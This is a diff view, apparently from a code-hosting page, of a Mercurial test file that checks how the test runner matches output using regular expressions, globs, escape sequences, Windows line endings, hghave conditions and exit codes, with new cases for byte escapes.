45 global name should be visible in func()
46 >>> print('''multiline
46 >>> print('''multiline
47 ... string''')
47 ... string''')
48 multiline
48 multiline
49 string
49 string
50
50
51 Regular expressions:
51 Regular expressions:
52
52
53 $ echo foobarbaz
53 $ echo foobarbaz
54 foobar.* (re)
54 foobar.* (re)
55 $ echo barbazquux
55 $ echo barbazquux
56 .*quux.* (re)
56 .*quux.* (re)
57
57
58 Globs:
58 Globs:
59
59
60 $ printf '* \\foobarbaz {10}\n'
60 $ printf '* \\foobarbaz {10}\n'
61 \* \\fo?bar* {10} (glob)
61 \* \\fo?bar* {10} (glob)
62
62
63 Literal match ending in " (re)":
63 Literal match ending in " (re)":
64
64
65 $ echo 'foo (re)'
65 $ echo 'foo (re)'
66 foo (re)
66 foo (re)
67
67
68 Windows: \r\n is handled like \n and can be escaped:
68 Windows: \r\n is handled like \n and can be escaped:
69
69
70 #if windows
70 #if windows
71 $ printf 'crlf\r\ncr\r\tcrlf\r\ncrlf\r\n'
71 $ printf 'crlf\r\ncr\r\tcrlf\r\ncrlf\r\n'
72 crlf
72 crlf
73 cr\r (no-eol) (esc)
73 cr\r (no-eol) (esc)
74 \tcrlf (esc)
74 \tcrlf (esc)
75 crlf\r (esc)
75 crlf\r (esc)
76 #endif
76 #endif
77
77
78 Escapes:
79
80 $ $PYTHON -c 'from mercurial.utils.procutil import stdout; stdout.write(b"\xff")'
81 \xff (no-eol) (esc)
82
83 Escapes with conditions:
84
85 $ $PYTHON -c 'from mercurial.utils.procutil import stdout; stdout.write(b"\xff")'
86 \xff (no-eol) (esc) (true !)
87
78 Combining esc with other markups - and handling lines ending with \r instead of \n:
88 Combining esc with other markups - and handling lines ending with \r instead of \n:
79
89
80 $ printf 'foo/bar\r'
90 $ printf 'foo/bar\r'
81 fo?/bar\r (no-eol) (glob) (esc)
91 fo?/bar\r (no-eol) (glob) (esc)
82 #if windows
92 #if windows
83 $ printf 'foo\\bar\r'
93 $ printf 'foo\\bar\r'
84 foo/bar\r (no-eol) (esc)
94 foo/bar\r (no-eol) (esc)
85 #endif
95 #endif
86 $ printf 'foo/bar\rfoo/bar\r'
96 $ printf 'foo/bar\rfoo/bar\r'
87 foo.bar\r [(]no-eol[)] (re) (esc)
97 foo.bar\r [(]no-eol[)] (re) (esc)
88 foo.bar\r \(no-eol\) (re)
98 foo.bar\r \(no-eol\) (re)
89
99
90 testing hghave
100 testing hghave
91
101
92 $ hghave true
102 $ hghave true
93 $ hghave false
103 $ hghave false
94 skipped: missing feature: nail clipper
104 skipped: missing feature: nail clipper
95 [1]
105 [1]
96 $ hghave no-true
106 $ hghave no-true
97 skipped: system supports yak shaving
107 skipped: system supports yak shaving
98 [1]
108 [1]
99 $ hghave no-false
109 $ hghave no-false
100
110
101 Conditional sections based on hghave:
111 Conditional sections based on hghave:
102
112
103 #if true
113 #if true
104 $ echo tested
114 $ echo tested
105 tested
115 tested
106 #else
116 #else
107 $ echo skipped
117 $ echo skipped
108 #endif
118 #endif
109
119
110 #if false
120 #if false
111 $ echo skipped
121 $ echo skipped
112 #else
122 #else
113 $ echo tested
123 $ echo tested
114 tested
124 tested
115 #endif
125 #endif
116
126
117 #if no-false
127 #if no-false
118 $ echo tested
128 $ echo tested
119 tested
129 tested
120 #else
130 #else
121 $ echo skipped
131 $ echo skipped
122 #endif
132 #endif
123
133
124 #if no-true
134 #if no-true
125 $ echo skipped
135 $ echo skipped
126 #else
136 #else
127 $ echo tested
137 $ echo tested
128 tested
138 tested
129 #endif
139 #endif
130
140
131 Exit code:
141 Exit code:
132
142
133 $ (exit 1)
143 $ (exit 1)
134 [1]
144 [1]
General Comments 0
You need to be logged in to leave comments. Login now